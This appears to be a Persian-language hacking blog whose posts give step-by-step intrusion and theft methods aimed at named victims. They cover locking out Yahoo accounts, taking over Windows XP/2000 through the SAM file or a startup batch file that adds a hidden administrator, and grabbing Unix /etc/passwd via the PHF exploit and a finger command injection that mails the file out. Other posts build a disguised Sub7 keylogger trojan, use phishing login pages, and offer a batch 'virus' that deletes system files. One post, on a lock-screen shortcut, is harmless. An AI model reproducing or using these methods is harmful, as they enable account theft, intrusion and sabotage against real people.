زهره،اشکان

85/12/29

www.Yahoomail.com
رفته سپس آي دي مورد نظر را وارد كنيد و تا 10 بار كلمه عبورش رو اشتباه بزنيد، سپس
ياهو فکر میکند که قصد هک داريد و یا با استفاده از برنامه قصد دارید کلمه عبور را
حدس بزنید. به همين جهت آي دي مورد نظر براي 12 ساعت و یا بیشتر بسته خواهد شد. -
گاهی آي دي عده ایی در مسنجر نميره ولي وارد صندوق پستيشون ميشوند. دليل این امر رو
بعضي ها User Room هاي Romace مي دونن و بعضي هام مشكل ياهو. - بعضي اوقات بخاطر
Ignor شدن هاي زياد اين حالت پيش مي ياد. - اين روش هم تازه راه افتاده و به اين
ترتيب هست كه ميل ياهو رو ميل بومبر مي كنند به اين ترتيب ياهو آي دي طرف رو قفل
میکنند. راه مقابله هم اين هست كه اگه ديديد آي دي شما به حالات اولیه که در بالا
توضیح داده شد بسته شده، وارد www.Yahoomail.com بشيد يك بار آي دي و كلمه عبور رو
بزنيد، باز همون صفحه خواهد آمد ولي با اين تفاوت كه زير جايي كه كلمه عبور مي
خواهد محلی وجود دارد كه يك رمز نوشته كه پس از زدن اون و دوباره وصل شدن وارد
صندوق پستي خودتون مي شيد. ولي اگر به روش پایانی که در آخر شرح داده شد بسته شده
با آي ديتون خداحافظي كنيد. ..
ادامه مطلب

لینک نوشته| نوشته شده در ساعت 16:52 توسط : اشکان

85/12/29

در اين مقاله سعي دارم روش نفوذ به ويندوز XP , 2000 را شرح بدهم

براي اين کار چند روش وجود دارد کا روش اول هميشه کارساز نيست و فقط بر روي کامپيوتر هايي جواب ميدهد که از نظر پيکربندي امنيتي بسيار ضعيف هستند .

روش اول :

در جايي که از شما UserName , Password پرسيده مي شود کليد هاي Alt+Ctrl+Del را دو مرتبه همزمان فشار دهيد . در قسمت UserName کلمه Administrator را وارد کرده و جاي کلمه عبور را خالي بگذاريد و Enter بزنيد تا وارد ويندوز شويد ...

خوب اين روش ساده بود اما هميشه کارساز نيست اگر براي Administrator آن کلمه عبوري قرار داده شده باشد ؟!!

به سراغ روش دوم ميرويم :

روش دوم :

1- ابتدا يک فلاپي Bootable مي سازيم .

2- اغلب فايل سيستم ويندوز XP,2000 از نوع NTFS است و در محيط شبيه Dos که با فلاپي راه اندازي ميشود شناخته نمي شود بنا براين ما براي اين کار نياز به برنامه هايي مثل NTFS4DOS داريم.(اين نوع برنامه ها امکان کار کردن با درايو هايي که فايل سيستم آنها Ntfs را در dos به ما مي دهد.)

3- حالا که فلاپي آماده شد بايد با آن سيستم را راه اندازي کرد... اما اگر در Setup سيستم تنظيم شده باشد که با فلاپي راه اندازي نشود ...؟!! آنگاه بايد به سراغ Setup رفت و در آن تنظيمات لازم را انجام دهيم اگر Setup با کلمه عبور محافظت شود آنگاه بايد به Bios نفوذ کنيم که در بخش نفوذ به Bios شرح داده شده است .

4- خوب پس از انجام مراحل فوق فلاپي را در فلاپي درايو قرار داده و سيستم را با آن راه اندازي مي کنيم . و بر نامه NTFS4DOS را اجرا مي کنيم تا به اطلاعات درايو هاي NTFS دسترسي داشته باشيم .

5- درايوي که ويندوز در آن نصب است را پيدا مي کنيم و به مسير زير رفته :

%Windir%\System32\Config\

Example : c:\windows\system32\config

در اين پوشه فايلي به نام * sam را در فلاپي کپي مي کنيم.

( نکته : در ويندوز 2000 با پاک کردن اين فايل ديگر کار تمام است و ميتوان با Username: Administrator و بدون پسورد وارد شويم اما ميتوان براي اين که رد پايي باقي نماند از فايل Sam يک کپي داشته باشيم تا بعد از انجام کارمان در ويندوز با برگرداندن اين فايل به جاي قبلي آن رد پاي خود را پاک کنيم و نام و پسورد کاربران به حالت قبل برگردد.)

از اين مرحله به بعد براي Windows Xp بيشتر توصيه ميشود :

6- بعد از کپي فايل با برنامه هايي نظير L0phtCrack ,John the Ripper آن را کرک مي کنيم تا پسورد را به دست آورد .

روش سوم :

در اين روش چهار مرحله اول روش دوم را انجام ميدهيم.

1- دستورات زير را در Notepad مي نويسيم و در فايلي با نام و پسوند test.bat ذخيره ميکنيم :

@echo off

net user administrator 123 /add

net localgroup administrator administrators /add

net user administrator 123

del test.bat

@echo on

2- بعد فايل مورد نظر را در فلاپي کپي کرده و به سراغ کامپيوتر قرباني مي رويم و فايلي که در مرحله قبل ساخته ايم را در مسير زير کپي مي کنيم(به فرض که ويندوز در درايو C نصب باشد و کاربري با نام MOJTABA مدير سيستم باشد):

C:\Documents and Settings\MOJTABA\Start Menu\Programs\Startup

3- خوب حالا فقط کافي است که منتظر بمانيد تا کاربر MOJTABA يک بار وارد شود ديگر تمام است و شما بعد از آن مي توانيد با نام کاربري Administrator و کلمه عبور 123 وارد سيستم شويد.

توضيح دستورات مربوط به فايلي که ميسازيم :

در خط اول اين دستور باعث مخفي شدن بقيه دستورات در حال اجرا از ديد کاربر مي شود.

در خط دوم ما يک کاربر بانام Administrator و کلمه عبور 123 مي سازيم .(اين عمل براي اين صورت مي گيرد که ممکن است نام Administrator را تغییر داده باشند).

در خط سوم کاربری را که در خط قبل ساخته ایم را به عنوان سرپرست (ادمین) سیستم قرار میدهیم.

در خط چهارم احتمال می دهیم که نام Administrator را تغییر داده نشده باشد . پس ما فقط پسورد آن را عوض می کنیم.

در خط پنجم برای از بین بردن رد پا فایلی را که ساخته ایم را پاک می کنیم.

در خط ششم هم حالتی را که دستور خط اول ایجاد کرده بود به حالت اول بر می گردانیم.

نکته : توجه کنید که به جای کاربر Administrator و کلمه عبور 123 هر کاربر یا کلمه عبور دیگری می توانید قرار دهید اما این کاربر کمتر باعث شک می شود .

روش چهارم :

استفاده از برنامه Windows XP / 2000 / NT Key است . نسخه آزمایشی این برنامه را می توانید از اینجا دریافت کنید.

نتیجه :

حالا که به عنوان مدیر وارد سیستم شدیم چه کارهایی می توانیم انجام دهیم .

اول این که می توانید به اطلاعات سیستم دسترسی پیدا کرده و ...

دوم این که توصیه می شود یک برنامه جاسوسی مثل XpSpy ها ویا Key Logger ها نصب کنید تا تمامی پسورد های ایمیل ها و کارتهای اعتباری و ... و وب سایت های که سر می زند و حتی کلماتی که چت می کند و ... را بدانید ( در آینده نه چندان دور مقاله ای در مورد برنامه های جاسوسی خواهم نوشت ).

سوم این که میتوانید یک تروجان روی کامپیوتر قربانی نصب کنید و بقیه اش رو خودتون میدونین ...

چهارم این که می توانید کامپیوتر او را طوری پیکر بندی کنید که به شما اجازه ریموت کردن را بدهد و با یک تروجان آی پی اون رو به دست آورید و اون را کنترل کنید .

پنجم ...

توصیه های مهم :

1- از دسترسی افراد نامطمئن به سیستم خود جلوگیری کنید .

2- حداقل کاری که میتونین انجام بدین این است که سیستم شما با CDو یا Floppy بوت نشود و Bios خود را با کلمه رمز محافظت نمایید.

3- همیشه از کلمات عبور پیچیده که مخلوتی از حرف و عدد و علائم ویژه باشد استفاده کنید . مثلا کلمه عبور X@#%Übps خیلی بهتر از کلمه عبور spssstudioworks است . این کار حداقل کرک کردن پسورد شما را طولانی میکند.

4- LM Hash را غیر فعال کنید . برای این منظور به کنترل پانل رفته و Local Security Policy را از Administrative Tools را اجرا کرده و به پوشه Security Option از پوشه Local Policies رفته و در آنجا Network Security : Do not Store LAN Manager hash value on next password change را Enable کنید سپس پسورد ادمین را عوض کنید.

5- نام کاربری Administrator وGuest را حتما تغییر دهید و برای آنها کلمه عبور قرار دهید .

6- اگر به کاربر Guest نیازی ندارید آن را غیر فعال کنید .

7- هر چند وقت یکبار پسورد خود را عوض کنید.

8- کاربران خود را هر چند وقت یکبار چک کنید تا از موارد مشکوک مطلع شوید.

ادامه مطلب

لینک نوشته| نوشته شده در ساعت 16:48 توسط : اشکان

85/12/29

- Hacker کيست ؟
هکر کسی است که با سيستم های کامپيوتری آشناست و می‌تواند با روش‌هايی خاص (بدون اجازه) وارد آنها شود... اين انسان می‌تواند خوب يا بد باشد ( در هر حال هکر است )

- سوال: يک هکر از چه راهی وارد يک سيستم می‌شود؟
از راه شبکه (نه بابا ! )
بايد توجه کنيد که هر سيستم کامپيوتری (به عبارت بهتر هر سيستم عامل) به هر حال محصول کار تعدادی انسان است و حتما دارای تعدادی bug (خطاهايی که بعد از ارائه محصول به بازار به تدريج کشف می‌شوند) خواهد بود. بعد از اينکه يک باگ مشخص شد، شرکت ها نرم‌افزارهايی را به‌سرعت (در عرض چند ساعت ) ايجاد می‌کنند تا مشکل رفع شود اين‌ها را patch می‌گويند. و بعد مديران شبکه (Wbemasters) در عرض چند روز تا چند سال (آين آخری در مورد ايرانه) آنها را download کرده و مشکل را حل می‌کنند. در اين فاصله هکرها دمار از روزگار اين سايت‌ها در می‌اورند...

- تعريف چند اصطلاح:

*** Hacker واقعی = سامورايی :
کسی که هدفش از نفوذ به سيستم‌ها نشان دادن ضعف سيستم‌های کامپيوتری است نه سوءاستفاده ...

*** Wacker (واکر):
کسی که هدفش از نفوذ به سيستم‌ها، استفاده از اطلاعات آن سيستم‌هاست (جرو هکر‌های کلاه‌ سياه )

*** Cracker (کراکر):
کسی که هدفش از نفوذ به سيستم‌ها، خرابکاری و ايجاد اختلال در سيستم‌های کامپيوتری است. (جرو هکر‌های کلاه‌ سياه )

*** Preaker :
از قديمي‌ترين هکرها هستند که برای کارشان نياز (و دسترسی) به کامپيوتر نداشتند و کارشان نفوذ به خطوط تلفن برای تماس مجانی، استراق‌سمع و ... بود. اين جزو آموزش من نيست چون کار خيلی بديه (-;

v زنگ ‌تفريح

- تقسيم بندی من برای هکر ها:

۱- جوجه‌هکرها (احمق کوچولوها):
توانايی‌ها: بلدند از Sub 7 , 187 استفاده کنند و فکر کنند ديگه همه‌چی رو ياد گرفته‌اند !

۲- خروس‌هکر‌ها يا مرغ‌هکرها (احمق‌های بزرگتر):
توانايی‌ها: Mail Box را هم می‌توانند Bomb کنند ... ماشاءالله !

۳- هکرهای قابل‌احترام ( مثل خود شما):
دارند ياد می‌گيرند و هنوز ۲،۳ سال کار دارند.

۴- هکرهای پيش‌کسوت:
ديگه آفتاب لبه بومه ... هکرهای قابل احترام را دوس دارند

v تقسيم‌بندی

- انواع کامپيوتر‌های شبکه:
=> کامپيوترهای Server : کامپيوترهايی که کارشان تامين اطلاعات در شبکه است، مثلآ کامپيوترهايی که سايت‌ها را نگه می‌دارند.
=> کامپبوتر‌های Client : کامپيوترهايی که استفاده کننده هستند مثل همين کامپيوتر خودتان که داريد ازش کار می‌کشيد.

- انواع سيستم‌ عامل‌هايی که Server ها از آن استفاده‌ می‌کنند:

=> سيستم‌های فعلی:
* خانواده Unix (مثل FreeBSD, Linux, Sun Solaris )
* خانواده Windows (مثل WinNT, Win2000 )
* OsMac
=> سيستم‌های قديمی (منقرض شده - آخيش ! ):
AIX, IRIS, DEC10, DEC20 , ...

- سوال: کدام‌ها را بايد ياد گرفت؟
Win2000, Unix(Linux) را بايد ياد بگيريد. پيشنهاد من اين است که Win2000و RedHat Linux را روی کامپيوتر خود همزمان داشته باشيد.

v برای شروع چه چيزی لازم است؟

۱- Win2000 , Linux را روی کامپيوتر خود نصب کرده و شروع به يادگيری کنيد.
۲- شروع به يادگيری زبان C کنيد.
۳- شروع به يادگيری TCP/IP کنيد. (يک کتاب بخريد )
۴- مهمترين چيز علاقه به طی کردن يک را بسييييييار طوووووولانی

v تقسيم‌بندی انواع حملات

Sub7 زياد هم بد نيست ولی نبايد زياده‌روی کرد) علت هم اينه که هربار که به اينترنت وصل می‌شوند ip جديدی به‌ آنها اختصاص پيدا می‌کنه و زحماتتون هدر می‌ره (البته برای جلوگيری از اين امر هم روشهايی هست که در آينده ايشالله ميگم).
حالا تقسيم‌بندی:
۱- حمله به روش Denial of Service Attack) DoS)
۲- حمله به روش Exploit
۳- حمله به روش Info Gathering (تلنت کردن يکی از مثالهای آن است که امروز آموختيد)
۴- حمله به روش Disinformation

v 133t Speak چيست؟

گاهی هکرها در هنگام نوشتن به جای تعدادی از حروف انگليسی معادل‌های قراردادی به کار می‌روند که ليست آنها را در زير می‌بينيد:
0 <= O1 <= L; I2 <= Z3 <= E4 <= A5 <= S6 <= G7 <= T8 <= B| <= L; I@ <= at (duh)$ <= S)( <= H}{ <= H/\/ <= N\/\/ <= W/\/\ <= M|> <= P; D|< <= Kph <= fz <= s

مثلا he Speaks می‌شود:
}{3 $|>34|< z
توصيه من اينه که از اين معادل‌ها تا جايی که می‌تونيد استفاده نکنيد. فقط ياد بگيريد که کم نياريد.

v ترسيم مسير برای آينده

۱- اولين و مهمترين تصميم انتخاب نوع کامپيوتری است که می‌خواهيد هک کنيد ( کلاينت يا سرور )، زيرا روش‌هک کردن اين‌دو بجز در مراحل ابتدايی کاملا متفاوت است.
۲- دومين گام انتخاب يک کامپيوتر مشخص (مثلا کامپيوتری که فلان سايت را نگه می‌دارد که مثالی برای کامپيوتر سرور است و يا کامپیوتر فلان شخصی که با او چت می‌کنيد که مثالی برای کامپيوتر کلاينت است) و جمع‌آوری اطلاعات در مورد آن است. اين جمع‌آوری اطلاعات از قربانی (Victim) را Footprinting گويند. اولين مشخصه‌ای که بايد کشف شود، ip اوست. يکی ديگر از اطلاعات مهم که معمولا دنبالش هستيم، پيدا کردن نوع سيستم‌عامل و نيز برنامه‌هايی است که کامپيوتر شخص از آنها بهره می‌برد. يکی از مهمترين ( و گاه خطرناک‌ترين) کارها، تست‌کردن پورت‌های آن کامپيوتر برای ديدن اينکه کدام پورت‌ها باز و کدام‌ها بسته هستند.
۳- مرحله بعدی در واقع شروع تلاش برای نفوذ به سيستم است. اين نفوذ سطوح مختلف دارد و بالاترين آن که در کامپيوترهای سرور روی می‌دهد، حالتی است که بتوان username و password مربوط به مدير کامپيوتر (administrator) يا superuser را به‌دست آورده و از طريق اين Shell Account به نهايت نفوذ دست‌ يابيم ولی گاه به‌دلايل مختلف (مربوط به سطح علمی خود و ... ) نمی‌توان به اين سطح دست‌يافت اما به هر حال برای مرحله بعدی می‌تواند استفاده شود. اين مرحله جايی است که هنر شما يه عنوان يک هکر آغاز شده و نيز به پايان می‌رسد.
۴- اين مرحله بعد از نفوذ روی می‌دهد که در آن به يک سطحی از کنترل سيستم رسيده‌ايد. رفتار شما در اين مرحله مشخص می‌کند که چه نوع هکر هستيد(سامورايی، واکر و يا کراکر) و اينکه آيا جنبه ياد گرفتن را داشته‌ايد يا نه، همينجا مشخص خواهد شد.
۵- مرحله آخر پاک کردن ردپاست تا گير نيفتيم (البته بعضی وقتها برای کلاس گذاشتن بايد گير بيفتيم، هه هه ...). بعضی از سيستم‌ها آمار login را نگه می‌دارند که در مورد آنها اين مرحله بسيار مهم است.

ادامه مطلب

لینک نوشته| نوشته شده در ساعت 16:23 توسط : اشکان

85/12/29

کارت اینترنت مجانی

چند روزي بود فكر استفاده از يك كارت اينترنت مجاني داشت ديوونم ميكرد... البته بگم ها ما حروم خور هم نيستيم ... آخه بابا به پير به پيغمبر نامرديه كه ما اين همه پول كارت هاي آبكي اينترنت رو ميديم ... يكمي هم كيف دنيا رو كنيم ..... اينه
در ضمن هر کی اکانت می خواد می تونه به من به گه !
Unixيكي از سرورهايي است كه در جهان بسيار از آن استفاده مي شود در ايران و دربيشتر شهر هاي بزرگ هم ISPهايي وجود دارند كه سرور آن ها Unixباشند .بنابر اين شما مي توانيد براي هك آن ها از اين راه ها استفاده كنيد شما در اين راه احتمالا با مشكلات زيادي برخورد خواهيد كرد .من راه كامل و بي عيبي را در اختيار شما نمي گذارم براي نفوذ گر شدن بايد تلاش بسياري كرد و اين اشاره اي است كه شما را به طرف راه درست هدايت مي كند .براي هك يونيكس از اين طريق عمل مي كنند كه با روش هايي كه ذكر خواهد شد فايل حاوي Passwordها و IDها را كه به نام Passwdمي باشد دريافت كنند .اين فايل يك فايل متني است كه در آن اطلاعات بصورت رمز در آمده .وقتي شما يك فايل Passwdرا باز كنيد چنين نوشته هايي را
مي بينيد .كه بايد آن را از حالت رمز در آورد .
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
Taha:3A62i9qr:1012:10:Mashhad

در اينجا مثلا Tahaنام IDو 3a62...كلمه عبور اما به صورت رمز در آمده مي باشد .
شايد فايل به شكل زير هم باشد .اما اين فايل كار را غيرممكن مي سازد.در صورتي كه به شكل زير باشد يعني در آن علامت *به جاي كلمه ي به رمز آمده به آن ها Shadowedگفته مي شود .
root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
Taha:*:1012:10:mashhad BFH:/home/user/Taha:/usr/local/bin/tcsh
ما فعلا مي خواهيم اين فايل را دريافت كنيم .اولين قدم اين است كه آيدي در آن ISPبراي خود دست و پا كنيم .حالا اين آيدي مي تواند متعلق به دوستمان باشد و يا يك آشناي دور .پيدا كردن رمز دوست شما به سادگي ميسر است كه در حوصله اين مقاله نمي گنجد .بعد از پيدا كردن رمز شما با آيدي دوستتان به شبكه Connectشويد .اين اتصال مي تواند يك اتصال به طريق Modem DialUp Connectionباشد .بعد از اتصال كامل وارد قسمت MS-DOS Promptشويد و فرمان زير را وارد كنيد
FTP http://www.domain.com/
كه Domainآدرس سرور ISPمي باشد سپس از شما خواسته مي شود تا آيدي خود را وارد كنيد كلمه ي Anonymousرا بزنيد .سپس وقتي درخواست كلمه عبور شد كليد Enterرا بزنيد .اگر وارد سيستم شديد موفق شده ايد در غير اين صورت جمله ي login failedدريافت مي شود .دوباره امتحان كنيد و اين بار در كادر Passwordآدرس Emailاي را وارد كنيد .اگر اين بار هم جواب نداد به جاي كلمه ي anonymousاز Userخود يعني دوستتان استفاده كنيد . احتمال دارد اين بار هم موفق نشويد .اين دفعه روش هاي فوق را براي دستور زير امتحان كنيد
FTP ftp.domain.com
اگر اين بار هم جوابي نگرفتيد با ISPتماس گرفته و سوال كنيد كه چگونه مي توانم از سرور FTPخود شما استفاده كنم چون وارد سيتمتان نمي شود اگر پرسيد براي چه مي خواهيد وارد شويد بگوييد مي خواهم از نرم افزار هاي آن استفاده كنم ولي مواظب باشيد كه نام خود را نگوييد .خلاصه تمام تلاش خود را براي فهميدن روش دستيابي به سيستم بكنيد اگر توانستيد وارد سيستم شويد به راحتي مي توانيد وارد شاخه ي مشخصي رفته و فايل Passwdها را بگيريد ولي احتمال دارد كه آن شاخه براي شما قفل شده باشد .براي كار با FTPبايد دستورات FTPرا ياد داشته باشيد .براي لسيت دستورات مي توانيد ?را تايپ كنيد .ابتدا به شاخه ي ETCبرويد مي توانيد فايل passwdرا در آنجا پيدا كنيد .اين فايل را بگيريد .اگر در آنجا نبود شاخه هاي ديگر را امتحان كنيد .ولي به احتمال زياد همانجاست .حال اگر اصلا نتوانستيد وارد FTPشويد مي توانيد اين فايل را با استفاده از قايلبيت PHFبگيريد .به اين صورت كه در Internet Browserخود آدرس زير را وارد كنيد .
http://www.domain.com/cgi-bin/phf?Q...t%20/etc/passwd
اگر به اين صورت هم نتوانستيد آن را بگيريد مي توانيد از طريق Fingerاين كار را انجام دهيد .اين روش به شرطي جواب مي دهد كه Serverمورد نظر قابليت Fingerرا داشته باشد .به آدرس زير مراجعه كنيد .
www.domain.com/cgi-bin/finger
اگر اين آدرس كار نكند ديگر هيچ اميدي نيست اما اگر كار كند كادري جلوي شما ظاهر مي شود كه مي خواهد نام مورد نظر خود را بدهيد .آدرس زير را وارد كنيد .
ID@domain.com ; /bin/mail you@somewhere.com < etc/passwd
كه در اين آدرس IDشناسه كاربري يك شخص است كه مثلا مي توانيد از آيدي دوستتان استفاده كنيد domain.comآدرس نام حوزه ي ISPاست و آدرس you@somewhere.comآدرس Emailشماست مثلا اين يك نمونه است .
bfh@internet.com ; /bin/mail amir6_6_6@yahoo.com < etc/passwd
با وارد كردن اين دستور فايل Passwdبراي من به آدرس 3dhack@yahoo.com پست مي شود !
خوب حالا تا الان اگر توانسته ايد فايل را گرفته باشيد كه بهتر در غير اينصورت بايد بي خيال اين روش شويد .
حالا اگر فايل shadowedگير آورديد بقيه ي متن را نخوانيد چون كمكي به شما نمي كند و بايد از روش هاي ديگري استفاده كرد .اما اگر يك فايل مثل نمونه اولي كه در بالا بود گير آورديد مي توانيد كار خود را ادامه دهيد حالا شما نياز به يك برنامه ي Unix Password Crackerداريد معروف ترين اين نوع برنامه ها John Ripperو Cracker Jackمي باشد .اما John Ripper سريعترين نوع اين برنامه مي باشد .اين دو برنامه را مي توانيد از همان آدرس قبلي يعني www.hackersclub.com/km/frontpageبه دست بياوريد اما نمونه ي ديگري از اين نمونه برنامه ها به كتابخانه هك به نام jill_v20 ارسال شد .با استفاده از اين برنامه ها مي توانيد به هدف خود برسيد . به همين راحتي .....
و روش بعد :
+در آینده ای نزدیک اگه پیشنهادها زیاد تر بشه و این بر و بچ پرشین بلاگ گیر ندن یه آموزش آماده کردم که با عکس توضیح دادم این روش 99 درصد عملی است و انجام می شه من که مشکلی نداشتم !

ادامه مطلب

لینک نوشته| نوشته شده در ساعت 16:21 توسط : اشکان

85/12/29

خوب راستش اين كار به همين راحتي كه مردم فكر ميكنن نيست ولي راههاي مختلفي وجود دار که من ۶ تاشو میگم و هفتمی و بقیه رو میزارم برای بعد که یکم ........ :
روش ها :
1 – قبلا به هتون گفتم !
********************************
2 – حدس زدنه اونه : من با یکی از هکرا صحبت می کردم گفتم بهترین روش هک چیه اون گفت بهترین روش یاده ترین روشه و شما هم می تونید پسورد ایمیل رو حدس بزنید !
********************************
3ـCrack:
يكي از راه ها Crack كردن پسورد طرف براي اين كار نياز به يه برنامه Cracker مثل Yahoo!Cracker دارين كه ميتونين اونو از سايت:
http://www.yahpro.com/
download كنين
روش اين برنامه به اين صورت كه با امتحان كردن پسوردهاي زياد در مدت كم پسورد طرف رو براي شما پيدا كنه به صورتي كه شما يه ليست با فرمت txt در اختيارش بذارين كه پر از اعداد و كلمه ها باشه و يا اين كه بصورت Random خودش انتخاب كنه
*******************************
4ـTrojan:
اين روش بهتريه و درصد براي به دست آوردن پسورد خيلي بالاست و شما براي به دست آوردن هر نوع پسوردي ميتونين از اون استفاده كنين(چه پسورد اينترنت و چه پسورد ياهو و Msn و ...)
۱-وارد سايت http://www.sub7.net/ بشين
۲-Enter كنين
۳ـوارد قسمت Downloads بشين
۴ـروي Old Version Downloads كليك كنيد
۵ـSub7 2.2 رو download كنين
۶ـپس از download و Setup كردن به فولدري كه برنامرو Setup كردين برين و فايل:EditServer.exe رو اجرا كنين
۷ـپس از اجرا كردن يه پنجره باز ميشه و شما Run In Normal Mode(اجرا در محيط نرمال) رو انتخاب كنين
۸-به Port كاري نداشته باشين و در صورت مايل بودن براي سرور خود پسورد انتخاب كنين
۹-در منوي سمت چپ به startup methods كاري نداشته باشين و بر روي Notification كليك كنيد
۱۰-روي add e-mail notify كليك كنيد و آدرس اي ميل خودتون رو وارد كنين(@ يادتون نره)
۱۱-حالا دوباره از منوي سمت چپ PlugIns رو انتخاب كنين
۱۲ـرو add binded Plugin كليك كنين
۱۳ـاز فولدر PlugIns پلاگ اين s7keys.dll رو انتخاب كنين
۱۴-روي exe icon/other كليك كنين
۱۵-در اين قسمت ميتونين براي سرور خودتون آيكون و Error گمراه كننده درست كنين
۱۶-روي ...Save as كليك كنين و سرور خودتون رو Save كنين

نكته :
۱-توجه داشته باشين كه براي Save كردن بايستي exe. رو بنويسين
۲-هرگز فايل server.exe رو اجرا نكنين همينطور سرورهايي كه خودتون ساخته ايد
۳-بهتر است براي آن كه كسي به exe بودن سرور شما شك نكنه از پسوند scr. به جاي exe. استفاده كنين(موقع Save كردن)
۴ـبهتر است هميشه E-mail ياهوي خودتونو بدين و Msn و Hotmail اكثرا كار نميكنند.

Hack:
۱-پس از ساختن سرور كافيست اونو براي كسي كه مايل به Hack كردنش هستين بفرستين پس از اين كه طرف فايل رو اجرا كرد به آدرس E-Mail كه دادين يه ميل مياد كه Subject:Online و پس از باز كردن در اون يه شماره IP وجود داره اونو كپي كرده و سپس برنامه Sub7.exe رو اجرا كرده و در قسمت IP وارد كنين(Port هم همچنين) و بر روي Connect كليك كنين
۲-پس از وصل شدن به كامپيوتر طرف از منوي سمت چپKeys/messeges رو انتخاب كنين
۳-سپس KeyBoard رو انتخاب كنين
۴-بعد Open KeyLogger رو باز كنين و بر روي آيكون ¤دست¤ كليك كنين

حالا تمام كليدهاي كه طرف شما وارد ميكنه قابل ديدن هستن كافيه يه بار اونو از باهو بندازين بيرون و منتظر بمانين كه دوباره LogIn كنه و پسوردشو وارد كنه
در صورتي كه اين كار جواب نداد ميتونين از قسمت Yahoo!Spy استفاده كنين

نكته:
براي بدست آوردن اينترنت بر روي Advanced/Passwords/Ras Passwords كليك كنين و پس از Upload شدن پلاگ اين مربوطه ميتونين پسوردهاي طرفو در ببارين
در صورتي كه Windows طرف XP باشه متاسفم چون امكان در آوردن پسورد وجود نداره
********************************
5 – از طریق رفتن پروفایل ! خوب قبل از این که یاهو سیستم امنیتیش رو عوض کنه پروفایل و ایمیل روی یه سرور کدبندی شده بودند و شما می تونستید با نگاه کردن به کد بندی و آدرس پروفایل و یکمی زیرکی بدون دونستن پسورد ایمیل وارد یاکس ایمیلش بشید که این روش بعد از تغیر سیستم امنیتی یاهو خیلی خیلی سخت شده و شاید هم ناممکن !
********************************
6- شبیه سازی صفحه ورود به ایمیل است که درواقع پشت اون یه پسورد سندر همه کارارو انجام می ده ! و به این شکل هست که ایتدا یه صفحه لاگین ایمیل مانند یاهو می سازید و در سایت خودتون قرار میدی و فرد با وارد شدن به این قسمت و دادن پسورد خود در واقع اونو به ایمیل شما می فرسته !
********************************
7- بهترین راه بدست آوردن پسورد ایمیل هست البته بکم سخته اما نود تا صد درصد جواب می ده اینطوری هست که . . . متاسفم !
********************************
8- والا من يه برنامه نوشتم يه جورايي هم كار ميكنه نحوه كارش هم اينجوريه كه يه فايل [B]Exe[/B] هست كه براي طرف بايد بفرستم و اونم بايد اجرا كنه بعد از اجرا بعد از چند دقيقه كه طرف شك نكنه ياهو مسنجرش چنج يوزر ميكنه و برنامه من با استفاده از توابع [B]Api[/B] ويندوز هندل ياهو مينجر اون و بدست مياره و هر چي داخل دوتا تكس باكساي اون نوشته بشه و مي خونه بعدشم معلومه كه اون دو تا نوشته رو برام ايميل ميكنه !

ادامه مطلب

لینک نوشته| نوشته شده در ساعت 16:19 توسط : اشکان

85/12/29

قفل کردن کامپيوتر توسط يک Shortcut

شايد تا به حال به فکر يافتن راهی بوده ايد که کامپيوتر خود را راحت تر از آنچه متداول است در حالت Lock قرار دهيد. اين کار بسيار ساده است و با طی کردن مراحل زير شما ميتوانيد یک Icon به صفحه نمايش یا Quick Launch اضافه کنيد که با يک ضربه ماوس بر روی آن سيستم شما در حالت Lock قرار ميگیرد.
1- بر روی صفحه نمايش خود Right-Click کنيد و از Shortcut، New را انتخاب کنيد
2- در پنجرهای که ظاهر شده در قسمت Type the location of the item فرمان زير را بنويسيد:
rundll32.exe user32.dll,LockWorkStation
3- Next را بزنيد و نام Shortcut را وارد کنيد و کليد Finish را بزنيد.
جهت راحتي بيشتر پيشنهاد ميشود که ميانبر(Shortcut) ايجاد شده را با ماوس به یک قسمت از فضای خالی Quick Launch بکشيد تا از اين پس در هنگام نياز با زدن يک کليد دستگاه شما در حالت Lock قرار گيرد
به همين سادگي يه راه ساده ترم هست كافيه تو Windows Xp همزمان با هم كليدهاي: Windows+L رو فشار بدين rundll32.exe user32.dll,LockWorkStation این فایل رو Shortcut کنید تو دسکتاپ : در ويندوز سرى NT باعث LogOff ميشود ودر ويندوز هاى سرى Win9X باعث Shutdown ميشود

ادامه مطلب

لینک نوشته| نوشته شده در ساعت 16:17 توسط : اشکان

85/12/29

اینم یه ویروس باحال در win xp :

یه Text Document باز کنید و بعد این کامند رو توش بنویسید :

del autoexec.bat

del config.sys

cd winnt

del system.ini

del win.ini

بعد فایل رو با پسوند bat .سیو کنید.

مثل این : nofooz.bat

این فایل رو وقتی برای کسی بفرستید هیچی نمیشه ولی وقتی اجراش کنه و کامپیوترش رو ریست کنه دیگه ویندوزش بالا نمیاد .

من ویروس رو برای راحتی کارتون گذاشتم ولی مواظب باشید خودتون اجراش نکنید .

ادامه مطلب

لینک نوشته| نوشته شده در ساعت 16:12 توسط : اشکان

85/12/29

وقتی شما به یک سیستم عمومی مراجعه میکنید مثل کافی نت شما میتونید به پسورد آخرین نفر ی که چت کرده با id او دسترسی پیدا کنید حتی اگه پسوردشو save نکرده باشه برای این کار شما باید به منوی start رفته و بعداز آن run در آنجا تایپ کنید regedit ودر آنجا به این شاخه برویدHKEY_CURRENT_USER\Software\Yahoo\Pager و تو فایل هائی که سمت راست ظاهر میشه save password رو انتخاب کرده و روش2 بار کلیک کنید در اونجا گزینه ی value data رو از مقدار 1 به 100 تبدیل کنید حالا ok رو بزنید و از رجیستری خارج بشید حال میتونید با آخرین آی دی لوگاین بشید و با یک برنامه که پسورد ستاره دار رو باز می کنه پسوردشو پیدا کنید راه های دیگری نیز برای پیدا کردن پسورد یا هو وجود داره و یکی از اونا استفاده از برنامه های کرکر است که این برنامه پسورد ها رو یکی یکی امتحان می کنه و این کار خیلی وقت گیره و بهش نمی ارزه اگه نظر من و می خوایید من می گم یه تروجان رو سیستم بریزید که وقتی با اون ایدی وارد می شید پسوردشو بهتون میل کنه یا اگه حوصله ندارید میتونید با استفاده از اون آموزشایی که داده شده یه لینک برای این کارای خبیسانتون داشته باشید یا یه تروجانی که پسورد در میاره رو تو نت آپلود کرده داشته باشید(همه این کارارو در این مجموعه یا مجموعه 2 آموزش داده شده ) موفق باشید.....

ادامه مطلب

لینک نوشته| نوشته شده در ساعت 15:27 توسط : اشکان